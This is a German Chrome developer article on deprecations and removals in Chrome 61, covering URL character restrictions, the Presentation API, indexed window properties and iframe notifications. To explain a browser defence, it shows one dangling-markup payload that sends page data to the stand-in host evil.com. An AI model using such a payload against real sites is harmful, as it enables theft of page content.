Einstellungen und Entfernungen in Chrome 61

Joe Medley
Joe Medley

In fast jeder Version von Chrome gibt es eine beträchtliche Anzahl von Updates und Verbesserungen des Produkts, seiner Leistung und auch der Funktionen der Web-Plattform. In diesem Artikel werden die Einstellungen in Chrome 61 beschrieben, das sich seit dem 3. August in der Betaphase befindet. Diese Liste kann sich jederzeit ändern.

Sicherheit und Datenschutz

Ressourcen blockieren, deren URLs die Zeichen „\n“ und „<“ enthalten

Es gibt eine Art von Hacking, das als Wangling Markup Injection bezeichnet wird. Dabei wird eine abgeschnittene URL verwendet, um Daten an einen externen Endpunkt zu senden. Angenommen, eine Seite enthält <img src='https://evil.com/?. Da die URL kein schließendes Anführungszeichen enthält, lesen Browser das nächste Anführungszeichen und behandeln die eingeschlossenen Zeichen so, als wäre es eine einzelne URL.

Chrome 61 minimiert diese Sicherheitslücke, indem die in den Attributen href und src zulässigen Zeichensätze eingeschränkt werden. Insbesondere werden in Chrome keine URLs mehr verarbeitet, wenn neue Zeilenzeichen (\n) und weniger als Zeichen (<) erkannt werden.

Entwickler mit einem legitimen Anwendungsfall für Zeilenumbrüche und weniger als Zeichen in einer URL sollten diese Zeichen stattdessen maskieren.

Entfernungsabsicht | Chromestatus-Tracker | Chromium-Fehler

Die Presentation API in unsicheren Kontexten einstellen und entfernen

Es wurde festgestellt, dass bei unsicheren Ursprüngen die Presentation API als Hacking-Vektor für unsichere Ursprünge verwendet werden kann. Da Displays keine Adressleiste haben, können mit der API Inhalte gefälscht werden. Es ist auch möglich, Daten aus einer Präsentation zu exfiltrieren.

Entsprechend der Absicht von Blink, leistungsstarke Funktionen bei unsicheren Ursprüngen zu entfernen, planen wir, die Unterstützung für die Presentation API für unsichere Kontexte einzustellen und zu entfernen. Ab Chrome 61 funktioniert PresentationRequest.start() nicht mehr bei unsicheren Ursprüngen.

Entfernungsabsicht | Chromestatus-Tracker | Chromium-Fehler

JavaScript

Definition von indexierten Attributen in Fenstern nicht zulassen

Bisher ließen einige Browser JavaScript-Zuweisungen wie die folgenden zu:

    window[0] = 1;

In den aktuellen HTML-Spezifikationshinweisen wird darauf hingewiesen, dass dies ein expliziter Verstoß gegen die JavaScript-Spezifikation ist. Diese Funktion wurde daher in Chrome 61 entfernt. Seit Februar 2016 erfüllt Firefox die Anforderungen bereits.

Chromium-Fehler

Verwendung von Benachrichtigungen aus unsicheren iFrames entfernen

Berechtigungsanfragen von iFrames können Nutzer verwirren, da es schwierig ist, zwischen dem Ursprung der entsprechenden Seite und dem Ursprung des iFrames zu unterscheiden, von dem die Anfrage stammt. Wenn der Umfang der Anfragen unklar ist, können Nutzer nur schwer beurteilen, ob sie die Berechtigung erteilen oder verweigern.

Wenn Benachrichtigungen in iFrames nicht zugelassen werden, werden auch die Anforderungen für die Berechtigung zum Senden von Benachrichtigungen mit denen für Push-Benachrichtigungen angeglichen, was die Abläufe für Entwickler vereinfacht.

Entwickler, die diese Funktion benötigen, können ein neues Fenster öffnen, um die Berechtigung zum Senden von Benachrichtigungen anzufordern.

Entfernungsabsicht | Chromestatus-Tracker | Chromium-Fehler